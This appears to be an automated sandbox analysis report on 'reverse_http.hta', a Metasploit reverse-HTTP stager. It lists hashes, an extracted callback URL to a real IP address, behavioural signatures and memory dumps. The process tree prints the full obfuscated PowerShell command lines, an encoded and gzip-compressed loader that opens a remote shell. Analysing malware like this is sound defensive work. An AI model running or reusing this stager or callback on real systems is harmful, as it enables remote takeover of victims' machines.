Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
30-05-2024 04:34
Static task
static1
Behavioral task
behavioral1
Sample
reverse_http.hta
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
reverse_http.hta
Resource
win10v2004-20240508-en
General
-
Target
reverse_http.hta
-
Size
8KB
-
MD5
9c913698ba90b57ff848a60b4d87e165
-
SHA1
1236a2d03734f898520d106e7e113419a859ac88
-
SHA256
b5cc3f9c8d9b898d00c5c93761058c7b7dd91c1921f8dc1358ccc1c3bced6004
-
SHA512
7e0e2c54acf540f581cc574dad82de570577534701a683857622237bc4bf608e093a7193193d38b5ddf0a377845fc355a688d4faa8dbe6749347aedec7ce3894
-
SSDEEP
192:5hn2jh1hqT2l39gHqB8TpEmp1Jr6KJTIBUmcEOKU6faL0H7Ald:jn2jh1hsW9gH5qmpK5UHtKU+aL08ld
Malware Config
Extracted
metasploit
windows/reverse_http
http://1.14.247.162:40001/GV_avNynVjlUxVXEMRJYfgkwNqbaOT2v9_VUCcSK8cpcf6987xqrQGI_TpQZAAxoszBBTm6HevhBHokGXDoLBz0GjVb8TaoWwpliHEh8_9uQGHUmi
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exeflow pid process 13 1068 powershell.exe 37 1068 powershell.exe 39 1068 powershell.exe 48 1068 powershell.exe 64 1068 powershell.exe 65 1068 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 3520 powershell.exe 1068 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 3520 powershell.exe 3520 powershell.exe 1068 powershell.exe 1068 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
mshta.exepowershell.exedescription pid process target process PID 932 wrote to memory of 3520 932 mshta.exe powershell.exe PID 932 wrote to memory of 3520 932 mshta.exe powershell.exe PID 932 wrote to memory of 3520 932 mshta.exe powershell.exe PID 3520 wrote to memory of 1068 3520 powershell.exe powershell.exe PID 3520 wrote to memory of 1068 3520 powershell.exe powershell.exe PID 3520 wrote to memory of 1068 3520 powershell.exe powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\reverse_http.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATABzAE0AMQB7ADEAfQBVAEMAQQA3AFYAWABlAFkALwBhAFMAaABMAC8ALwAwAG4AdgBPADEAaABQAFMAQgBpAEYANABaADUASgBpAEIAUgBwAGIAYwBBAGMAdwBlAGIAdwBoAGUARwBoAFYAVwBNADMAZAB7ADIAfQBQADcAaQBOADMAbQB5AE4AdgAzADMAYgBlAGEAWQB7ADEAfQBhAGkAVABIAGEAegBLADYAVQBsAGkAegA2AHEAcQBxAHQAKwBkAFQAWABiAFAASABJAFoAaQBTAE0AaABqAE4AOAByAHcAbAArAC8ALwB5AGIAYwB4AGgAUwBsAEsAQgBUAEUAUQBwAGcALwBmAGkAewAyAH0ATABoAGYAeQBjAEwASgB1AGwAbAArAFAAQwAzAGgASQArAEMAZQBKACcAJwArACcAJwBLAFMAcABKAHUASABDAEkAUwByAFQAOQArADcATwBSAHAAaQBpAE4AewAxAH0AWABWAGYANgBtAEUAbABaAGgAcwBNAE4ASgBUAGcAVABTADgASwAvAEIARAB2AEEASwBYADYAWQBiAEgAYgBZAFoAYwBKAGYAUQB1AEcAZgBsAFQANgBOAE4ANABqAGUAeQBNADQAZAA1AEEAWgBZAGUASgBBAGkAagA1ACsATgBZAHgAZAB4AHoAUwBwADYAUQBnAHsAMgB9AFQAaQAzAC8AKwBXAFMAeQB0AEgAdQByAHIAUwB1ADkATABqAG0AZwBtAEYAdgBWAHoAeABuAEIAWQA4AFMAZwB0AGwAbwBTAC8AJwAnACsAJwAnAFMALwB4AEMANAA1AHgAZwBzAGEAZwBTAE4ANAB7ADEAfQB6AGUATQBzAHEATgBvAG0AYQBqAFkAbwBaAFoAVwBpAEwATgBaAEIAewAxAH0AdwBDAHAAbQBRAGUAeABsAFIAVABEAGwAeABaACcAJwArACcAJwBnAFUAcwB6AHkATgB1AEUAMQBjAHkASgBWAEUATABNAEoAMABtAHMAYQB1ADUASAB7ADIAfQBwAHoAcgBKAGkAVwBWAGgAeAA4AGEAdgAxACsAaAAvAGkANgBuAGIAMwBQAEkAOABZAEMAWABGAGwARwBEAEcAYwB4AG8AbQBPADAAdwBOAHgAYwBWAFkAWgBvAE0AaQBqAGUASQA2ADMAYQArAEQAUwBXAFUAbwBpAGYAMQAwAHEAQQBkAHsAMgB9AGgAMwBtAE8AeABFAE8AVwBVAGwAbwBYAC8AUgBZAHkAbwA0AGUATQBkAHUAWgA5AGwARQBsADgAegBBAGQAVwBVAHAAYQBVAHkAZQBQAFEANwBLADkAJwAnACsAJwAnAFgAWQB5AHkAbQArADgAaABYAGYAVQBQAE0AUwBBAHkAVQBZAHoAMwBFAEEANgBQADMATgBBAGQAegBlAG8AeQBkAFIANQBzADQAYgAwAGYATwB5AGMAUgArAHIAeQB3AHsAMgB9AEcAbABjAFYAcABuAEoARQBMADgAeQBlAGgAVgBoAFoAVQB1AEIANgB4AE8ARAAzAEQAcwBtAEMAewAyAH0ATwBTADYAdABuAHcARwBIAGEANwA4AG0AagBVADMANQBaADgAWABWADcANwB6AEEAaQBaAFkANQA3AEsAeQBzAG0ASABqAHIARgAvADUAdgAzAEYAOQBJAHAAaQBHAG4AKwBYAEUAcwBkAC8ARwBXAFIATABoADcAagBsAEIASQAzAEgAdQA0AGkAbQA4ADUAQgBXADgAcAB2AHsAMgB9AEIAUwB1AFoATgBwAG8ASgA5AFkAJwAnACsAJwAnAHYAQgAxAGcAcgA0AHMAcAA5AGgASABqAFEAUABQAFkAKwBJADYAdABGAHgATAB7ADEAfQB6AEMAdgBuAGgASABvADQAbABWAHgAdwBiAEEAWgBhAGcAYwA5AEwAMwB5AHAAegA5AFoAMQBZAEgARQBZAHEARABnAEcAOQA2AHgAcQBDAHQAYgBDAEYASgBNAEYAMwA2AGwAdABpAG4ATwArADMAOAB6AFUAUQBGAFQAcwBVAFoAVgBsAFoAbQBPAGEAUQBwAFcANQBaADAARABHAGkAewAxAH0AQwBzAEwAVQBwAFMAUgB7ADEAfQA1AEcAVQBzAC8AZwB5AEwAYgA2AG8AcQArAGEAVQBFAFIAZABsADcAQwA1AHUAWABmAG8AVwB6AGQAdQB0AG4AVABqAEsAVwBKAHEANwA0AEYAWgBBAHcATgBBAFQANwBCAEoARQBPAFMAQgBsAFkAVQBBADgATABKADkAMQAnACcAKwAnACcANAB0ADkAdgBMADcANABKAFIAdwBkAFIAQwB0AHsAMgB9AEQAewAyAH0AZwA3AGcARAB0AGoAaABNAE8AaQBNAEIAMAB2AHEAbABXACsAQgBVAGEAcgBvAG0AQQAzAEQAaABPAEkAUQBpAEMANQBWAFEANgBIAEkAaAB4AHAAeABTADUASgBMAGUAQwBFAGYAZQA4AFcAMwBGAGIAMABuAHcAegBYAHkATwBUAEIAMwBSAEYANgBwAEMAZAA3AFcAYQBjAHoASwBnAHsAMgB9AFYAUwBCAGkAJwAnACsAJwAnAFcASQBnAHcAegBSADkAZgA4AHAAOABYADMAeAA0AGQAcAAwAFUAbgB4AHoAagBuAGgAUABzAFoAVgA4AFoAagB3AEgAQwB1AGgAdwA0AHsAMgB9ACcAJwArACcAJwBGADYAZwArAGcAQwBTAE0AbwBBAEQAQwBXAE4AUQB4AGwAbAArAEsAbAAxAEwAVABUAGkASAA5AFUASgBtAFUAbwB3AG4ATwAnACcAKwAnACcANQBBAEoAOQBqAGEAewAyAH0ALwByAHcAQwBKADgASwBuADkAbAA5ADcAMwAwAGUANwBRAFoAJwAnACsAJwAnAFYAJwAnACsAJwAnADAAaAB6AEcAcQB0AHYASgBwAG4AMwBsAGcAMABTAE8ALwB0AEgAOQBvAEUAbQB1AE4ALwBKAHcAVwA3AGQAYQBUAE8AOABOAFcAVwBjAHEARABXAGEAewAyAH0ASgByAGMAQwBWADYANABaAGYARgA3ADMAZgBWAE0AYQBHAEsAVABtAE8ANABGAEwAYQA5AFAAdQBvAEsAbwA3AFcAWQAwAGMAQgB6AGEAWABkAFoAWABoAHQAbABxAEQAUgBVADEAcQBOAGwAdQBUAFoAbQAwAFAANgBEAG4AJwAnACsAJwAnAEEAdAA1AGMAOABMAFMAVABIADAAeABqAG0AJwAnACsAJwAnAFUARgBFAG4AWQAzAG0AWQB5AGIAVQBoADcAWQAwADYAOAA0ADMAZABVAEoAWQB7ADEAfQBIAFYAUgBiAFMAcgBDADEANAAwAHgALwBjAHIAcgBWAGEAcgBYAHQAbwBmADQAagA5AFMAUQA1ADkAaABvADAAUgA5AFkAOABOAGcAWgB1AEsARgBlAHIAbAB1AG8AeAB3ADYAeAByAGgAdgB7ADIAfQB1AG0ASABNADcARABiAHYAOQBoAE8AeABUADUAdQBnAGYANgB1AE8AZAA1AEgAOQBXAHYARwBRAFQAegBnADkAZQBVAC8AVQBOAE8AdgBOAFYAUQA4AHIAVgBiAHUAWgBiAEkARQBmAGIAegBkADQAUABCADMANQBEAGcANwBVAGIAJwAnACsAJwAnAE8AVQA5AHcAOQBnAGcAOAB5AGIARABuAFUAYQBmAEIARAB1AE8AdgB3AHkAUABzADgAZQA4ADAANwBDADAAVABOADcAVABDAFQAZABNAC8AcQBFAGEAdgBCAFgAUQBTADYAaQBZAHsAMQB9AFIAdAB0AHEAMwBkAEkATQA1AEkATQBPAGoAVQBDAE8AUQBJAGUAbgBTAFkAdQByAGMAcABqAFgAbAAxAHQAbgBzAFoAeABnACsAOQBGAEcANABjAG4AQwB5AHQASwBaAG0AMwBWAGQAcAB6AFIAYwBOAGwAagBUAGkAQgBUAGkAbQBHADEAVABqAFoAegBIAFIAWAAxAHAAegBSAHEAYQBvAFgAOABOAGQAbQA1AGYAQwA3AFgAZAB2AHEAVQAxAGcANQBOAEwAbABZAEYAdQB0AFUAMQBYAFUAZABEAE0AVgBGAHEAYgBwAHYAWQAwAHsAMQB9ADQALwBNAGoAYgBFAGMATABoAGYATABlAEwAWQBQAEQAcQBqAG0ATwBmAE4AKwBXADUAMQBGADgAWABIAGUAUwBHAHgAbgBGADUAaQBPADMAVgA1ADQAVABUAGwARABaAHEAQwBnAGIAcgBDAGQATABLAHoANQB2AEIAWgBZAEcAMwBzAHYAbQBmADEAZwBRAFoAYgBWAGYAcgBWAHQAagAnACcAKwAnACcAMAA1AFUAaQB5AFYAcABGAEEAYwBLADYARgAvADMARABDAHYAYwBwAFoAYgBlAGUAZwA5AG4ATgB2AEsAVAA3AFEAWABiACsAagBJAGUAegB4AHcASABBADkANwBnAC8ANwByAFMAJwAnACsAJwAnAEoAOABQAGUARQBlAHoAdgBHAFUAYwBOAGQANgB0ADEAcwAxADEAdgA0AFcARABFAGoAVQBaADcATwBaAFoAewAyAH0AbQBQAFIAOQBTAGUAcABKAEUAbQBEAGkASgBNAHEAVQBnAGoAeQBRAE0AeAB7ADIAfQA5ADEAcgAxAFkANgBzAEMANQBvAHQAbABJAC8AbQB3AFQAUABLADcAJwAnACsAJwAnAFcAbgBZAFgAewAyAH0AcQBlAC8ARwA4AG4ASABRADUAZgBJAGYAcgBWADEAJwAnACsAJwAnADMAOABTADYAbwA4AHEASABxAHIAWgBQAFcAYQBaAHsAMQB9ADEAcgBwAHUAcgBoAG4ATwBXAHgAbwBjAGoAUQB5AFAAUQBUAFQAYQBxAGIAZgBQAFQASAA1AEEAYgBLADUATgBFAHIATgBsAFkARgA1AEoAdwBTAGIAdQA4AGgAZgB6ACsAVwB5AEgAbwBMADgAYQB2AGMAdQBSAEgASABWAEoARgBhAFIAWQBnAEMAcgB7ADIAfQBEAHoAZQA5AGUAdwBwAFEANABWAFcANwBkAGIAQgBvAFQAegBpAEcASwBsAHoAZgBSAEgAcQBjAFIAcAB2AEMATQBnAEkAZgBHAFAAZgBVAGwAUwBtAE8AWABOADkATgBMADMANABOAEcAZgBtAHsAMQB9AHYAJwAnACsAJwAnAHYATgB1AGIAdwA0AHQAZQBiADgAMQBLAHcAagBOAGgANgBhAFgATgAzAHIAYwArAGYAbAB5AEMAbAByAHkAbQBIAEUANgBWAE0AWQA1ADgARgBwAFIAcgBwAHsAMQB9AGEAdABCAHMAewAxAH0AeABkAHEAcQAxAEwAewAyAH0AWABqADUAMAAzAHIAeABNAGwAWgA1AEwATABLAHYATAB0AGUAbwBMAG4ASgBwAGgAZgBaAEkASQA1AHMAQgBWAEgAOAA5AFcARABCAEkANABwAEIATgBmADgAeABYAEQAOQBDAEQAdQA3AGUAUQAvAEcARgBiAG4AQwB0AGkAQgB3AC8ATwBZADcAcABhAC8AUgB1AGgAagB7ADEAfQBIAHcAeQB2AHcAQQBMAFUANgBtAEwANwBpADcANgBkAHIAbQBJAEMARQBCAC8AeABGAEsARABEACsAdgAnACcAKwAnACcASABqADkAWABDAGwAewAyAH0AVABGAFoALwBiAGUAVABjAFMAbgAnACcAKwAnACcAcwBBAFAAOQA1AC8AaQA1AHkAWAB2AGYAOQB3ACsAbABQAFIAVgBDAHQAZgBBAGYAcAB1ACsAOQB1AE4AVgAxADMAeABGADAASgBnAEkAOABLAEEAVQBvAGMAbQBSAGYASAAxADMAZgBRAHsAMQB9AEUAcgBkADAAZQBlAFYAbAA3AGgALwBJAGgAdQAxAHQAOABIADgAVAB7ACcAJwArACcAJwAyAH0ANQB3ADkAYQBQAEIAQwB2AGYAVABKAGYAdwBQAEcAeABTAGcALwB4AHcAdwBBAEEAQQB7ADAAfQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnADIAJwAnACwAJwAnAGsAJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIALsM1{1}UCA7VXeY/aShL//0nvO1hPSBiF4Z5JiBRpbcAcwebwheGhVWM3d{2}P7iN3myNv33beaY{1}aiTHazK6Uliz6qqqt+dTXbPHIZiSMhjN8rwl+//ybcxhSlKBTEQpg/fi{2}LhfycLJull+PC3hI+CeJ'+'KSpJuHCISrT9+7ORpiiN{1}XVf6mElZhsMNJTgTS8K/BDvAKX6YbHbYZcJfQuGflT6NN4jeyM4d5AZYeJAij5+NYxdxzSp6Qg{2}Ti3/+WSytHurrSu9LjmgmFvVzxnBY8SgtloS/'+'S/xC45xgsagSN4{1}zeMsqNomajYoZZWiLNZB{1}wCpmQexlRTDlxZ'+'gUszyNuE1cyJVELMJ0msau5H{2}pzrJiWVhx8av1+h/i6nb3PI8YCXFlGDGcxomO0wNxcVYZoMijeI63a+DSWUoif10qAd{2}h3mOxEOWUloX/RYyo4eMduZ9lEl8zAdWUpaUyePQ7K9'+'XYyym+8hXfUPMSAyUYz3EA6P3NAdzeoydR5s4b0fOycR+ryw{2}GlcVpnJEL8yehVhZUuB6xOD3DsmC{2}OS6tnwGHa78mjU35Z8XV77zAiZY57KysmHjrF/5v3F9IpiGn+XEsd/GWRLh7jlBI3Hu4im85BW8pv{2}BSuZNpoJ9Y'+'vB1gr4sp9hHjQPPY+I6tFxL{1}zCvnhHo4lVxwbAZagc9L3ypz9Z1YHEYqDgG96xqCtbCFJMF36ltinO+38zUQFTsUZVlZmOaQpW5Z0DGi{1}CsLUpSR{1}5GUs/gyLb6oq+aUERdl7C5uXfoWzdutnTjKWJq74FZAwNAT7BJEOSBlYUA8LJ91'+'4t9vL74JRwdRCt{2}D{2}g7gDtjhMOiMB0vqlW+BUaromA3DhOIQiC5VQ6HIhxpxS5JLeCEfe8W3Fb0nwzXyOTB3RF6pCd7WaczKg{2}VSBi'+'WIgwzR9f8p8X3x4dp0UnxzjnhPsZV8ZjwHCuhw4{2}'+'F6g+gCSMoADCWNQxll+Kl1LTTiH9UJmUownO'+'5AJ9ja{2}/rwCJ8Kn9l9730e7QZ'+'V'+'0hzGqtvJpn3lg0SO/tH9oEmuN/JwW7daTO8NWWcqDWa{2}JrcCV64ZfF73fVMaGKTmO4FLa9PuoKo7WY0cBzaXdZXhtlqDRU1qNluTZm0P6Dn'+'At5c8LSTH0xjm'+'UFEnY3mYybUh7Y06843dUJY{1}HVRbSrC140x/crrVarXtof4j9SQ59ho0R9Y8NgZuKFerluoxw6xrhv{2}umHM7Dbv9hOxT5ugf6uOd5H9WvGQTzg9eU/UNOvNVQ8rVbuZbIEfbzd4PB35Dg7Ub'+'OU9w9gg8ybDnUafBDuOvwyPs8e807C0TN7TCTdM/qEavBXQS6iY{1}Rttq3dIM5IMOjUCOQIenSYurcpjXl1tnsZxg+9FG4cnCytKZm3VdpzRcNljTiBTimG1TjZzHRX1pzRqaoX8Ndm5fC7XdvqU1g5NLlYFutU1XUdDMVFqbpvY0{1}4/MjbEcLhfLeLYPDqjmOfN+W51F8XHeSGxnF5iO3V54TTlDZqCgbrCdLKz5vBZYG3svmf1gQZbVfrVtj'+'05UiyVpFAcK6F/3DCvcpZbeeg9nNvKT7QXb+jIezxwHA97g/7rS'+'J8PeEezvGUcNd6t1s11v4WDEjUZ7OZZ{2}mPR9SepJEmDiJMqUgjyQMx{2}91r1Y6sC5otlI/mwTPK7'+'WnYX{2}qe/G8nHQ5fIfrV1'+'38S6o8qHqrZPWaZ{1}1rpurhnOWxocjQyPQTTaqbfPTH5AbK5NErNlYF5JwSbu8hfz+WyHoL8avcuRHHVJFaRYgCr{2}Dze9ewpQ4VW7dbBoTziGKlzfRHqcRpvCMgIfGPfUlSmOXN9NL34NGfm{1}v'+'vNubw4teb81KwjNh6aXN3rc+flyClrymHE6VMY58FpRrp{1}atBs{1}xdqq1L{2}Xj503rxMlZ5LLKvLteoLnJphfZII5sBVH89WDBI4pBNf8xXD9CDu7eQ/GFbnCtiBw/OY7pa/Ruhj{1}HwyvwALU6mL7i76drmICEB/xFKDD+v'+'Hj9XCl{2}TFZ/beTcSn'+'sAP95/i5yXvf9w+lPRVCtfAfpu+9uNV13xF0JgI8KAUocmRfH13fQ{1}Erd0eeVl7h/Ihu1t8H8T{'+'2}5w9aPBCvfTJfwPGxSg/xwwAAA{0}{0}')-f'=','2','k')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1068
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD558dc1ef0285e286c835471881410477a
SHA1b6f8eb1ef1f7b1ca77fe038a26f29015f3a45369
SHA25607ede8f68ab707886a55e6a4aa754ad281b44fcd9402b3a8066dfd64d238b39b
SHA5127b0721a40ef02ae0352971056ffbaa08dbf0a8b8c83d76f036bfa191c2389f6cdd48a4d1616658adad63ca0dba1504fc9b5edd9777457731d5d5786a762b966f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hetgcf1l.yx0.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1068-37-0x0000000005BC0000-0x0000000005BC1000-memory.dmpFilesize
4KB
-
memory/1068-36-0x0000000006680000-0x00000000066CC000-memory.dmpFilesize
304KB
-
memory/3520-4-0x0000000004D70000-0x0000000004D92000-memory.dmpFilesize
136KB
-
memory/3520-20-0x0000000007660000-0x0000000007CDA000-memory.dmpFilesize
6.5MB
-
memory/3520-5-0x0000000005670000-0x00000000056D6000-memory.dmpFilesize
408KB
-
memory/3520-7-0x00000000056E0000-0x0000000005746000-memory.dmpFilesize
408KB
-
memory/3520-17-0x0000000005750000-0x0000000005AA4000-memory.dmpFilesize
3.3MB
-
memory/3520-18-0x0000000005D20000-0x0000000005D3E000-memory.dmpFilesize
120KB
-
memory/3520-19-0x0000000005D70000-0x0000000005DBC000-memory.dmpFilesize
304KB
-
memory/3520-6-0x0000000070E50000-0x0000000071600000-memory.dmpFilesize
7.7MB
-
memory/3520-21-0x0000000006240000-0x000000000625A000-memory.dmpFilesize
104KB
-
memory/3520-0-0x0000000070E5E000-0x0000000070E5F000-memory.dmpFilesize
4KB
-
memory/3520-25-0x0000000070E50000-0x0000000071600000-memory.dmpFilesize
7.7MB
-
memory/3520-3-0x0000000070E50000-0x0000000071600000-memory.dmpFilesize
7.7MB
-
memory/3520-2-0x0000000004E90000-0x00000000054B8000-memory.dmpFilesize
6.2MB
-
memory/3520-1-0x0000000002740000-0x0000000002776000-memory.dmpFilesize
216KB